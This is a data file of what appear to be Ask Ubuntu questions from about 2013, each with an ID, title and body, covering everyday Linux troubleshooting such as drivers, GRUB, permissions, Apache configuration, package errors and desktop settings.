276664	where are the openvpn connection logs and configuration files ?	i have problem connecting to openvpn server . where are openvpn log files and how do i find the connection details ?
276669	how to monitor disk activity ?	how do i view my disk activity on ubuntu ? for example , how can i monitor what is being written and read from disk as well as the percentage of disk usage ? i am looking for an application similar to the resource monitor in windows .
276678	apachectl configtest shows syntax ok even errors are there in the configuration file	given below is one of my apache configuration files : < virtualhost *:80 > servername testeight.qburst.uws documentroot /home/testeight/public_html/testeight1 directoryindex index.html < directory /home/testeight/public_html/testeight1 > options -indexes followsymlinks multiviews allowoverride none order allow , deny allow from all authuserfile /home/testeight/.htpasswd authname `` authentication required ! '' authtype bas require valid-user < /directory > < /virtualhost > here i misspelled basic as bas in the authtype field . but if i run following command , apachectl configtest it will output syntax ok . if i try to access the index.html through the website , the browser shows internal server error . is there any apache specific command to find out such configuration errors ?
276684	does big_writes option in mount command can cause file corruption ?	i 've been transferring huge files about 5 gb from ext4 to ntfs and i have noticed the slow write speed about 1.5 to 2 mbps sometimes about 900 kbps . now i 've found out that adding `` big_writes '' option to the mount command would speed it up to about 25 mbps . does this option can corrupt my files in my ntfs drive since because it is not used by default ?
276689	how to appear drive on windows if whole drive is selected as swap space ?	i was installing ubuntu at time of drive selection i selected whole drive d as swap area and then i quit the installaton now it is not appearing in windows and even in try ubuntu button as came up on boot please help to get back my drive so that i can see that drive in windows
276690	why does chmod 644 make directories inaccessible ?	i have a bunch of media files ( that only need to be 644 ) that were a mix of various permissions . some were group or global writable so i thought , just to be safe , i 'll chmod them all back to 644 . the problem is there is a directory hierarchy and for all the directories that were caught in this ls -l displays them as : d ? ? ? ? ? ? ? ? ? ? ? ? ? ? dirname if i chmod that to 744 , it 's fixed . my question is : what 's going on here ? do directories need to be executable ?
276691	installed mediterraneandark theme , but does n't look like example	i have installed a theme in ubuntu 12.10 , and the preview image looks like . however , nautilus file manager looks the same , it 's just the window manager top part ( title , close , minimise maximise ) which has changed . am i missing a step ? to clarify : the colours have changed , but the layout and buttons remain the same . it looks like . thanks in advance .
276692	editing youtube video description , titles through terminal	is there a way to edit youtube video description and title/tags through terminal ? if so , then how to do it ? unfortunately , googlecl does not have such function yet .
276693	a weird thing about sublime text 2 installed	i downloaded sublime text 2 , unpacked it to /opt/sublime and created a link of /opt/sublime/sublime_text ( executable ) in /usr/bin so now i can just call it by typing `` sublime '' in console . but it 's not appeared in applications list : if i type sublime there , it wo n't be shown . only if type sublime_text , i will see it . but there is more : when i click on it , it wo n't launch , nothing wo n't happen at all ! besides , if i lock it launcher , i wo n't be able to launch it : i close it , when i click on it on the launcher panel , but it does n't launch and nothing happens ! why is that happening ?
276694	ca n't view output in tty . ( ctrl+alt+f1 to f6 do n't work , and display a black screen ) .	i recently noticed that there was a kernel warning saying that the nvidia driver was n't compatible with booting into a video mode terminal , so i edited /etc/default/grub , to make it boot into a text only terminal . this worked fine for several days , but now suddenly when i go into a tty i only get a black screen and a flashing cursor . the resolution is also very low . i am actually able to log in and run commands , i just do n't get any output , all happens is the cursor moves . what i have tried : setting it to boot back into video mode - same in a tty apart from this time there were vertical blue lines running down it echo framebuffer=y > /etc/initramfs-tools/conf.d/splash - no difference , although plymouth did start earlier in the boot . neither of these have worked , what do you recommend i try next ? adding nomodeset in grub - no change [ edit ] as requested output from lsmod $ lsmod module size used by nls_iso8859_1 12713 1 nls_cp437 16991 1 vfat 17585 1 fat 61512 1 vfat pci_stub 12622 1 vboxpci 23237 0 vboxnetadp 13382 0 vboxnetflt 23478 0 vboxdrv 287082 3 vboxpci , vboxnetadp , vboxnetflt kvm_amd 55848 0 kvm 415550 1 kvm_amd parport_pc 32866 0 ppdev 17113 0 bnep 18281 2 rfcomm 47604 0 bluetooth 180153 10 bnep , rfcomm binfmt_misc 17540 1 snd_hda_codec_realtek 224173 1 ip6t_log 16974 4 xt_hl 12521 6 ip6t_rt 12558 3 nf_conntrack_ipv6 13906 7 nf_defrag_ipv6 13412 1 nf_conntrack_ipv6 ipt_reject 12576 1 ipt_log 12919 5 xt_limit 12711 12 xt_tcpudp 12603 42 xt_addrtype 12713 4 xt_state 12578 14 nvidia 11300349 40 ip6table_filter 12815 1 ip6_tables 27864 3 ip6t_log , ip6t_rt , ip6table_filter nf_conntrack_netbios_ns 12665 0 nf_conntrack_broadcast 12589 1 nf_conntrack_netbios_ns nf_nat_ftp 12704 0 nf_nat 25891 1 nf_nat_ftp nf_conntrack_ipv4 19716 9 nf_nat nf_defrag_ipv4 12729 1 nf_conntrack_ipv4 nf_conntrack_ftp 13452 1 nf_nat_ftp nf_conntrack 81926 8 nf_conntrack_ipv6 , xt_state , nf_conntrack_netbios_ns , nf_conntrack_broadcast , nf_nat_ftp , nf_nat , nf_conntrack_ipv4 , nf_conntrack_ftp iptable_filter 12810 1 snd_hda_intel 33719 3 snd_hda_codec 127706 2 snd_hda_codec_realtek , snd_hda_intel snd_hwdep 17764 1 snd_hda_codec ip_tables 27473 1 iptable_filter x_tables 29891 13 ip6t_log , xt_hl , ip6t_rt , ipt_reject , ipt_log , xt_limit , xt_tcpudp , xt_addrtype , xt_state , ip6table_filter , ip6_tables , iptable_filter , ip_tables snd_pcm 97275 2 snd_hda_intel , snd_hda_codec snd_seq_midi 13324 0 arc4 12529 2 snd_rawmidi 30748 1 snd_seq_midi rt2800pci 18715 0 rt2800lib 58967 1 rt2800pci crc_ccitt 12707 1 rt2800lib k10temp 13166 0 rt2x00pci 14620 1 rt2800pci rt2x00lib 55326 3 rt2800pci , rt2800lib , rt2x00pci mac80211 506862 3 rt2800lib , rt2x00pci , rt2x00lib edac_core 53746 0 psmouse 97485 0 edac_mce_amd 23709 0 serio_raw 13211 0 cfg80211 205774 2 rt2x00lib , mac80211 eeprom_93cx6 12767 1 rt2800pci snd_seq_midi_event 14899 1 snd_seq_midi snd_seq 61929 2 snd_seq_midi , snd_seq_midi_event snd_timer 29990 2 snd_pcm , snd_seq snd_seq_device 14540 3 snd_seq_midi , snd_rawmidi , snd_seq snd 79041 15 snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device soundcore 15091 1 snd snd_page_alloc 18529 2 snd_hda_intel , snd_pcm mac_hid 13253 0 i2c_nforce2 13058 0 lp 17799 0 parport 46562 3 parport_pc , ppdev , lp usbhid 47238 0 hid 99636 1 usbhid ums_realtek 18248 0 usb_storage 49243 2 ums_realtek forcedeth 63460 0 sata_nv 32286 2 lspci -v : $ lspci -v 00:00.0 ram memory : nvidia corporation mcp61 memory controller ( rev a1 ) subsystem : hewlett-packard company device 2a99 flags : bus master , 66mhz , fast devsel , latency 0 capabilities : < access denied > 00:01.0 isa bridge : nvidia corporation mcp61 lpc bridge ( rev a2 ) subsystem : hewlett-packard company device 2a99 flags : bus master , 66mhz , fast devsel , latency 0 i/o ports at 4f00 [ size=256 ] 00:01.1 smbus : nvidia corporation mcp61 smbus ( rev a2 ) subsystem : hewlett-packard company device 2a99 flags : 66mhz , fast devsel , irq 11 i/o ports at 4900 [ size=64 ] i/o ports at 4d00 [ size=64 ] i/o ports at 4e00 [ size=64 ] capabilities : < access denied > kernel driver in use : nforce2_smbus kernel modules : i2c-nforce2 00:01.2 ram memory : nvidia corporation mcp61 memory controller ( rev a2 ) subsystem : hewlett-packard company device 2a99 flags : 66mhz , fast devsel 00:02.0 usb controller : nvidia corporation mcp61 usb 1.1 controller ( rev a3 ) ( prog-if 10 [ ohci ] ) subsystem : hewlett-packard company device 2a99 flags : bus master , 66mhz , fast devsel , latency 0 , irq 23 memory at fbeff000 ( 32-bit , non-prefetchable ) [ size=4k ] capabilities : < access denied > kernel driver in use : ohci_hcd 00:02.1 usb controller : nvidia corporation mcp61 usb 2.0 controller ( rev a3 ) ( prog-if 20 [ ehci ] ) subsystem : hewlett-packard company device 2a99 flags : bus master , 66mhz , fast devsel , latency 0 , irq 22 memory at fbefec00 ( 32-bit , non-prefetchable ) [ size=256 ] capabilities : < access denied > kernel driver in use : ehci_hcd 00:04.0 pci bridge : nvidia corporation mcp61 pci bridge ( rev a1 ) ( prog-if 01 [ subtractive decode ] ) flags : bus master , 66mhz , fast devsel , latency 0 bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=64 capabilities : < access denied > 00:05.0 audio device : nvidia corporation mcp61 high definition audio ( rev a2 ) subsystem : hewlett-packard company device 2a99 flags : bus master , 66mhz , fast devsel , latency 0 , irq 22 memory at fbef8000 ( 32-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel 00:07.0 bridge : nvidia corporation mcp61 ethernet ( rev a2 ) subsystem : hewlett-packard company device 2a99 flags : bus master , 66mhz , fast devsel , latency 0 , irq 43 memory at fbefd000 ( 32-bit , non-prefetchable ) [ size=4k ] i/o ports at e480 [ size=8 ] capabilities : < access denied > kernel driver in use : forcedeth kernel modules : forcedeth 00:08.0 ide interface : nvidia corporation mcp61 sata controller ( rev a2 ) ( prog-if 85 [ master seco prio ] ) subsystem : hewlett-packard company device 2a99 flags : bus master , 66mhz , fast devsel , latency 0 , irq 21 i/o ports at e400 [ size=8 ] i/o ports at e080 [ size=4 ] i/o ports at e000 [ size=8 ] i/o ports at dc00 [ size=4 ] i/o ports at d880 [ size=16 ] memory at fbefc000 ( 32-bit , non-prefetchable ) [ size=4k ] capabilities : < access denied > kernel driver in use : sata_nv kernel modules : sata_nv 00:08.1 ide interface : nvidia corporation mcp61 sata controller ( rev a2 ) ( prog-if 85 [ master seco prio ] ) subsystem : hewlett-packard company device 2a99 flags : bus master , 66mhz , fast devsel , latency 0 , irq 20 i/o ports at d800 [ size=8 ] i/o ports at d480 [ size=4 ] i/o ports at d400 [ size=8 ] i/o ports at d080 [ size=4 ] i/o ports at d000 [ size=16 ] memory at fbef3000 ( 32-bit , non-prefetchable ) [ size=4k ] capabilities : < access denied > kernel driver in use : sata_nv kernel modules : sata_nv 00:09.0 pci bridge : nvidia corporation mcp61 pci express bridge ( rev a2 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=02 , subordinate=02 , sec-latency=0 capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:0b.0 pci bridge : nvidia corporation mcp61 pci express bridge ( rev a2 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=03 , subordinate=03 , sec-latency=0 capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:0c.0 pci bridge : nvidia corporation mcp61 pci express bridge ( rev a2 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=04 , subordinate=04 , sec-latency=0 memory behind bridge : fbf00000-fbffffff capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:0d.0 vga compatible controller : nvidia corporation c61 [ geforce 6150se nforce 430 ] ( rev a2 ) ( prog-if 00 [ vga controller ] ) subsystem : hewlett-packard company device 2a99 flags : bus master , 66mhz , fast devsel , latency 0 , irq 21 memory at fa000000 ( 32-bit , non-prefetchable ) [ size=16m ] memory at e0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at f9000000 ( 64-bit , non-prefetchable ) [ size=16m ] [ virtual ] expansion rom at fbec0000 [ disabled ] [ size=128k ] capabilities : < access denied > kernel driver in use : nvidia kernel modules : nvidia_current , nouveau , nvidiafb 00:18.0 host bridge : advanced micro devices [ amd ] family 10h processor hypertransport configuration flags : fast devsel capabilities : < access denied > 00:18.1 host bridge : advanced micro devices [ amd ] family 10h processor address map flags : fast devsel 00:18.2 host bridge : advanced micro devices [ amd ] family 10h processor dram controller flags : fast devsel kernel modules : amd64_edac_mod 00:18.3 host bridge : advanced micro devices [ amd ] family 10h processor miscellaneous control flags : fast devsel capabilities : < access denied > kernel driver in use : k10temp kernel modules : k10temp 00:18.4 host bridge : advanced micro devices [ amd ] family 10h processor link control flags : fast devsel 04:00.0 network controller : ralink corp. rt3090 wireless 802.11n 1t/1r pcie subsystem : lite-on communications inc device 7602 flags : bus master , fast devsel , latency 0 , irq 19 memory at fbff0000 ( 32-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : rt2800pci kernel modules : rt2800pci uname -a : linux ********* 3.2.0-39-generic # 62-ubuntu smp thu feb 28 00:28:53 utc 2013 x86_64 x86_64 x86_64 gnu/linux
276700	error : package architecture ( amd64 ) does not match system ( i386 )	i am trying to install ubuntu 12.10 and by the way my wireless is not working . so , i 'm trying to fix this problem manually . i have installed the 64 bit ubuntu already . the problem is i can not install any packages because when i do i get an error . for example if i run thus command sudo dpkg -i wireless-bcm43142-dkms_6.20.55.19-1_amd64.deb , i get this error : dpkg : error processing wireless-bcm43142-dkms_6.20.55.19-1_amd64.deb ( -- install : package architecture ( amd64 ) does not match system ( i386 ) i also get this error if i try to install any package . my system is a dell 3421 which has an i5 processor so i do n't know why ubuntu think i have a i386 system . if i run the uname command i get these results : uname -i i686 uname -p i686 uname-m i686 thanks in advance for any help .
276701	is there any difference between os version beside de and support time ?	i 'm sorry if this has been questioned many times , but i 'm still not sure i understand fully . what 's the different between lts and normal release ? other than support time , of course . i mean , is there any specific os feature ? iirc , lts on point-releases get updated kernel and de version matching to normal release , right ? and i do n't really see many new non-de feature . currently i 'm using unity in mint 14 , but does n't feel much different from when i was using ubuntu 12.04 ( which means most of 12.04 feature is unity 's feature , right ? ) i want to switch to ubuntu again since people said 12.04.2 is pretty good . but i wonder if i should just wait for 13.04 . if there 's really no specific os feature , and if 12.04.2 get the same unity version as 13.04 , then i 'll pick 12.04.2 for longer support time .
276703	lost windows frames , how to get them back ?	i am running xfce on 12.04 on an asus 1201n netbook . since yesterday 's ( 2013-03-31 ) update i have no more window borders so i ca n't move them , resize , close . also the keyboard shortcuts seem to be gone . any suggestions would be great ! ( maybe it 's an april fools joke ? ; ) i looked at this post and following the instructions got the windows title bar back . now i can close , minimize , or maximize but still ca n't move or resize . also , the windows seem to `` blink '' when i try the context menu . please someone help ! i am in a big programming task and this is blocking everything ! thanks , bob
276704	system encountered problem	recently i updated to ubuntu 12.10 and am frequently getting the system encountered problem dialogue . it is related to the datacard modem connectivity problem . kindly please anyone say if anybody encountered the problem .
276710	how do you get the unity launcher to autohide underneath other windows while not autohiding when all windows are un-maximised ?	that is suppose you have google chrome open or some other program how can we get the unity launcher to autohide when it ( the program ) is open and maximised but to reappear when it 's unmaximised ( i.e . it does n't cover the entire desktop ) . i am running 12.10
276713	i ca n't install ubuntu 12.10 on my notebook/	when i install on notebook ( hp pavilion dv6-3110er . amd n830 2100mhz / ati mobility radeon hd 5470 ) ubuntu 12.10 x64 , the installation freezes on the logo . throws an error failed to load file amd ucode/microcode_amd.bin . can this be fixed ? excuse my poor knowledge of the language . i am from zimbabwe
276715	empathy internet messaging error [ no reason specified ]	iam using ubuntu 12.10 , empathy internet messaging was working fine . until yestrday i do n't the reason it shows error under every email . with [ no reason specified ] why it happened . and how can i fix it thanks , yours semary , answer : i found it the solution , and it worked fine with me . open your newtwork , if your proxy is on manual or automatic make it none . it should work fine with you then .
276716	trying to remap caps lock in xubuntu , but keyboard layouts plugin resets everything	i am using keyboard layouts plugin to switch between two layouts . i want to remap caps lock to underscore `` _ '' first i empty caps lock , or otherwise caps lock will do both â toggle caps and produce underscore character and then map caps lock to underscore xmodmap -e `` keycode 66 = `` xmodmap -e `` keycode 66 = underscore '' problem ? this resets every time i log out or change something in keyboard layouts plugin preferences . i want this to be permanent .
276717	ubuntu 12.04 lts crash when starting a guest on vmware 9.0.2	just recently moved to ubuntu from ms platforms . i 'm running ubuntu 12.04 lts and using vmware 9.0.2 for various purposes . a few days ago , my vmware workstation started to crash my system every time i start it after resume ( i mean - ubuntu is suspended and then resumed ) . not sure , but i think it started after one of the system updates i made a few day ago ( i think there was a kernel update ) . i use : ubuntu 12.04 lts ( 32bit ) , kernel 3.5.0-26-generic , vmware workstation 9.0.2 , gnome-shell 3.6 ( but it also crash when on unity ) i tried re-install vmware , but no change . please help me to figure out what is causing it and how to resolve it . edit : since i ca n't yet attached a screenshot , here is a link to the image : http : //postimg.org/image/mlddu6nzn/ thanks !
276723	getting powernap 's iomonitor to work with postgresql	i have a 12.04 box running postgresql 9.1.8-0ubuntu12.04 , which serves a java webapp ( an atlassian confluence wiki ) . i 'm trying to take advantage of powernap 's iomonitor feature . however , if i uncomment the corresponding line in /etc/powernap/config : [ iomonitor ] postgres-io = `` postgres '' ... powernap never allows the box to go to sleep , the logs ( with debug=3 ) show this : looking for [ postgres-io ] iomonitor activity found , reset absent time [ 0/60 ] one thing i have noticed is that postgres appears to be respawning processes every 2-3 mins ( even without any user activity against the wiki ) ; every time this happens , powernap prints : < powernap.monitors.iomonitor.iomonitor instance at 0xxxxx > - adding new pid 16783 to list . the pids in questions appear to be the ones serving my wiki db , eg : postgres 16783 1067 0 11:05 ? 00:00:00 postgres : confluence confluence 127.0.0.1 ( 50689 ) idle i presume this is getting in the way ? is this an issue with postgres ( is it supposed to respawn processes that often , even w/o activity ? ) . any pointer as to how i go about debugging this would be most appreciated ( maybe starting with how powernap infers i/o activity - since there are many postgres processes , perhaps i can find a regexp that will target just the right one ? ) . ps : if i comment out the postgres iomonitor , powernap works a treat but then it does suspend the box while the wiki is being used ...
276725	how do i get libreoffice base to access ms access 2003 data	if i 'm to leave microsoft xp behind i need to work with my ms access data files in libreoffice base or something similar . how do i get libreoffice base to access ms access 2003 data files ?
276728	my ubuntu runs both unity and gnome shell at the same time	unity and gnome 3 at same time my ubuntu seems to run unity and gnome 3 at exactly the same time . sure , i like it , but is there a way to remove unity launcher ?
276732	ubuntu 12.04 runs in 2d only , has intel 82865g graphics	ubuntu 12.04 runs only in 2d have an intel 82865g graphics controller . could this be the problem ? went to the intel download center , and this card is supposed to support 3d . it seems ubuntu does not recocnize this card .
276733	root partition oddly full	the root partition of my 12.10 kubuntu distro is full and i do n't really understand why , since fileflight shows that 72 % of the disk space usage of my root partition is being used by the `` home/ '' my account name '' '' folder , wich should be in a different partition . i have a kubuntu distro 12.10 , installed along with windows 7 dual boot . my partition settings of my 1 terabyte hard drive are the followings : 720gb to my windows partition 200mb boot partition 200gb extended partition : 177gb /home -- - 13gb used 14gb / -- - 12,9gb used 8gb swap it seems like the disk space is being shared and everything i add/put on my home partition is being reflected on my root partition . is this normal ? sudo mount output : /dev/sda6 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) /dev/sda5 on /home type ext4 ( rw ) df output : filesystem 1k-blocks used available use % mounted on /dev/sda6 14156280 13172704 264472 99 % / udev 1984828 12 1984816 1 % /dev tmpfs 799100 960 798140 1 % /run none 5120 0 5120 0 % /run/lock none 1997744 224 1997520 1 % /run/shm none 102400 8 102392 1 % /run/user /dev/sda5 183681828 14293548 160057764 9 % /home filelight output of my root directory : source solved it . the problem was that virtualbox installed my windows server 2012 多image ? in the root partition , inside the root folder . firelight was missleading me < . < . thank you all for the help .
276736	programs not showing anymore on the left of the screen	i had installed vlc , which was showing on left-hand side of the screen , but after a reboot i do n't see it anymore , as is the case with gparted , which i alsoinstalled to be able to change a label of a partition
276741	who is scping your ssh server	just you can run w to find who is sshing into your server , how can you find out who is scping into an ubuntu laptop ?
276742	uck build error	i am trying to use uck to customize lubuntu 12.04 . on lubuntu desktop installation when the uck tries to build files computer automatically shuts down . i have installed 2.4.5 version of uck through synaptic . 2.i can not use uck without gui.while running command uck-remaster-pack-rootfs it says can not stat dir/file tmp//remaster-root/proc/4185/task/4185/ns/net because no such file or directory , and build fails . can someone help to sort out above queries .
276748	install ubuntu 32 bit on windows 8 uefi	i have just bought a new laptop with windows 8 ( uefi ) preinstalled . i want to install ubuntu 32 bit as a second partition , but the ubuntu 32 bit doesnt recognise uefi . is there anyway i can install ubuntu 32 bit ( 12.10 ) ?
276749	how do you move the unity launcher to the bottom of the screen ?	i am running 12.10 if it helps . i want to move it to the bottom of the screens so it 's easier for me to see as many launchers as possible without having to make the icons too small .
276755	installation problem /usr/bin/dpkg returned an error code ( 1 )	anything i tried to install i get this error message : no apport report written because maxreports is reached already errors were encountered while processing : linux-image-3.2.0-23-generic-pae linux-image-3.2.0-24-generic-pae linux-image-3.2.0-26-generic-pae linux-image-3.2.0-27-generic-pae linux-image-3.2.0-30-generic-pae e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i 've tried most of the tips people say : apt-get upgrade , apt-get -f install , apt-get update . and i 've always got the same error .
276758	warning messages while compiling c program using gcc	i am new to linux . i use gcc ( ubuntu/linaro 4.6.3-1ubuntu5 ) 4.6.3 on ubuntu 12.04 lts . when i compiled the c program using pointer , i got the -wformat warning as shown below . but if i execute a.out file , i get the correct result . can anyone please tell me why i got the message and suggest me what i should do to overcome ? . my testing program : # include < stdio.h > void main ( void ) { int x=10 , y , z ; int *p= & x ; printf ( `` \n\np = % u\n '' , p ) ; printf ( `` \n*p = % u\n '' , *p ) ; printf ( `` \n & x = % u\n '' , & x ) ; printf ( `` \n & y = % u\n '' , & y ) ; printf ( `` \n & z = % u\n '' , & z ) ; printf ( `` \n & p = % u\n\n '' , & p ) ; } output : qust1-array.c:11:2 : warning : format ‘ % u’ expects argument of type ‘unsigned int’ , but argument 2 has type ‘int *’ [ -wformat ] qust1-array.c:14:2 : warning : format ‘ % u’ expects argument of type ‘unsigned int’ , but argument 2 has type ‘int *’ [ -wformat ] qust1-array.c:15:2 : warning : format ‘ % u’ expects argument of type ‘unsigned int’ , but argument 2 has type ‘int *’ [ -wformat ] qust1-array.c:16:2 : warning : format ‘ % u’ expects argument of type ‘unsigned int’ , but argument 2 has type ‘int *’ [ -wformat ] qust1-array.c:17:2 : warning : format ‘ % u’ expects argument of type ‘unsigned int’ , but argument 2 has type ‘int **’ [ -wformat ]
276759	how to become active directly an open app ?	i 'm wondering how do you switch the open apps.. what do you usually use to go directly to an app ? are you using any shortcuts ? are you placing the apps in different desktops and go to them using ctrl+fnumber ? or are you still using alt-tab : ) ? i 'm using ubuntu 12.04 and xfce .
276760	ubuntu 12.10 ca n't adjust brightness on my laptop	i ca n't adjust the screen brightness on my hp 2000-2b09wm 15.6-inch laptop . everything is standard on this machine . i have absolutely no idea where to start . any help would be welcome , as i can only get about 3 hours of battery life as is . i was getting almost 5 hours on windows 8 , with the screen as dim as it could get . i use this machine to take notes in school and do assignments between classes , and finding an outlet is n't always an option , but neither is booting back into windows , gross . edit : i hope this goes without saying , but i 've tried the brightness buttons on my keyboard as well as trying to adjust the brightness in the settings . i 'm using the cinnamon desktop , if that makes a difference , but the problem is still there with unity .
276763	locked out of administrator account and do not remember root password ( password was manually set for root )	i was writing a script to help force myself to go to bed . it had two parts , first , it would lock my account at 11pm using crontab . then , i added a unlock if statement that was supposed to unlock the account after 5am . obviously the unlock script did not work , but that is n't the current question , just some background . normally , as many would suggest you would drop to root console from grub . however , i can not do this because i am still inexperienced in ubuntu and at some point i enabled the root account and set a password i do not remember for it . stupid , i know . is there any ways to unlock my account ?
276765	update-grub shows three images ?	when i 'm running update-grub get following output : generating grub.cfg ... found linux image : /boot/vmlinuz-3.5.0-26-generic found initrd image : /boot/initrd.img-3.5.0-26-generic found linux image : /boot/vmlinuz-3.5.0-25-generic found initrd image : /boot/initrd.img-3.5.0-25-generic found linux image : /boot/vmlinuz-3.5.0-17-generic found initrd image : /boot/initrd.img-3.5.0-17-generic found memtest86+ image : /boot/memtest86+.bin done why are there three images listed ? i 've read `` grub shows same linux image twice '' too . this has n't solved my problem . content of my /etc/grub.d/ is : $ ls -l -rwxr-xr-x 1 root root 7541 okt 14 19:36 00_header -rwxr-xr-x 1 root root 5488 okt 4 11:30 05_debian_theme -rwxr-xr-x 1 root root 10891 okt 14 19:36 10_linux -rwxr-xr-x 1 root root 10258 okt 14 19:36 20_linux_xen -rwxr-xr-x 1 root root 1688 okt 11 16:10 20_memtest86+ -rwxr-xr-x 1 root root 10976 okt 14 19:36 30_os-prober -rwxr-xr-x 1 root root 1426 okt 14 19:36 30_uefi-firmware -rwxr-xr-x 1 root root 214 okt 14 19:36 40_custom -rwxr-xr-x 1 root root 216 okt 14 19:36 41_custom -rw-r -- r -- 1 root root 483 okt 14 19:36 readme
276769	ubuntu 12.10 crackling and popping sound	i 've an asus z92v , i am running ubuntu 12.10 and since i installed ubuntu on this notebook the audio keep crackling and popping continuously . moreover the volume bar on gnome-shell panel keep jumping from low volume to high volume continuously . this is indifferently through speakers and headphones ... it 's an unbearable and annoying problem ! ! ! since it 's a common problem of intel-hda-audio i 've found a lot of solutions and hints around web , but nothing has solved my problem ... this is the output from lspci -v | grep -a7 -i `` audio '' : 00:1b.0 audio device : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) high definition audio controller ( rev 04 ) subsystem : asustek computer inc. asus a6vc flags : bus master , fast devsel , latency 0 , irq 41 memory at febfc000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel i tried to mute / unmute all mixer channels ( via alsamixer ) , but it did n't change anything . please help me , guys ... thanks p.s . output from sudo lshw -c multimedia : *-multimedia description : audio device product : 82801fb/fbm/fr/fw/frw ( ich6 family ) high definition audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 04 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:41 memory : febfc000-febfffff
276772	replace title bar with a full window border	i 'm wondering if it 's possible to remove the titlebar of every window and instead add a coloured border a few pixels thick around the whole window and stil keep the ability to move the window around . i used compiz settings tool to remove window decorations but that leaves me with unmovable windows so i figured that might not be the best approach , my second idea is to edit the gtk theme . is this possible or should i look for another window manager to accomplish this ?
276773	unable to compile with vbnc on ubuntu 12.04	i 'm running ubuntu 12.04 lts . in order to try out some .net exercises , i installed the below mono packages : sudo apt-get install mono-runtime mono-mcs mono-vbnc now , i 've got the mono csharp compiler ( mcs ) working fine . however , the vb.net compiler ( vbnc ) is throwing the below error : the library 'system.design.dll ' could not be found any idea what have i missed ?
276775	ubuntu 12.04 ; internet connection established , but no access	i 've been trying to figure this out for a while and i am unable to do it , even though i 've read through a lot of answered questions on this site . i got a netbook with ubuntu 12.04 on it . after plugging in the internet cable , the computer tells me that the connection is established . after clicking the firefox logo , there appears an error site of my internet provider . this happens , because i did n't type in my user name and password . now where can i type them in so the computer lets me browse the internet ? thank you !
276782	defragmenting and increasing performance of old lubuntu system with swap partition	i am using the latest lubuntu on an intel celeron 1.7ghz and 512mb ram . lately system performance has deteriorated significantly . the hard disk is an 80gb ide drive and we suspect it to be the cause . what is the optimal swap size and is `` defrag '' recommended ? # df -k filesystem 1k-blocks used available use % mounted on /dev/sda1 76415040 5607304 66926008 8 % / udev 242220 4 242216 1 % /dev tmpfs 99800 764 99036 1 % /run none 5120 0 5120 0 % /run/lock none 249492 380 249112 1 % /run/shm
276788	trouble installing 12.10 on a ga-990fxa-ud3 base machine : network and usb do n't work	i 've spent two days pulling my hair out trying to get ubuntu to install correctly on a new machine i built using a gigabyte ga-990fxa-ud3 motherboard . ubuntu seems to install fine , however , neither the network nor usb 3.0 drivers work out of the box . the board has a realtek 8111e chip and to fix the network i 've been trying to download and install the realtek r8168-8.035.00 driver . i was able to get the driver on to the machine by swapping out the mouse , keyboard and usb stick from the two working usb 2.0 ports . however , it wo n't compile . i get the following error : build the module and install make : *** /lib/modules/3.5.0-17-generic/build : no such file or directory . stop . i found a thread from a failed upgrade that suggests you can solve this by using apt-get to reinstall the kernel package . so i downloaded the kernel package from a net capable laptop , moved it over to the machine on a usb drive and reinstalled it . that fixed the compile error and the driver seemed to install fine from there . but still no dice connecting to the net after install . i have n't even started trying to tackle the usb controller drivers . has anyone had any success getting ubuntu to play nice with this mobo ? what did you have to do ?
276793	ubuntu 13.04 dual boot uefi windows 8 preinstalled acer	i have read so many tutorials here on other places , but never see an instruction that is suitable for me . i have tried to boot secureboot in uefi boot all seems fine in the installation , but after the installatiuon that seems to work good as dual boot , i just get windows 8 at the boot loader lines , which looks like grub , but i am not sure really . but no sign of the ubuntu instalation just the windows 8 option . so my question is if there is a complete tutorial . or do i have to wait until 13.04 is finally released ? yes there is tutorials like `` http : //www.linuxbsdos.com/2012/11/05/dual-boot-windows-8-and-ubuntu-12-10-on-uefi-hardware/ `` but it does not work at all they use both a lot of partitions but not clearly say explain the efi boot wich imply they did not use this method at all. , not clearly say if this is a secure boot or something different and use easybcd windows program .
276799	automatically shade window on unfocus	i have certain windows ( for example , empathy ) that i want to be automatically roll up ( or shade ) upon being unfocused and to roll down ( or un-shade ) when focused . i can manually roll the windows up and when focus returns , they roll down . however , when they lose focus again , they do not roll back up . is there a way to enable this behavior ? i know that i can execute the following command to shade the active window , but i do n't know how to cause such a command to trigger on unfocus . wmctrl -r : active : -b `` add , shaded '' switching to a different window manager , such as compiz , is an option if it is capable of providing such behavior and interacting with xfce . i 'm currently using xfce 4.10 with xfwm4 .
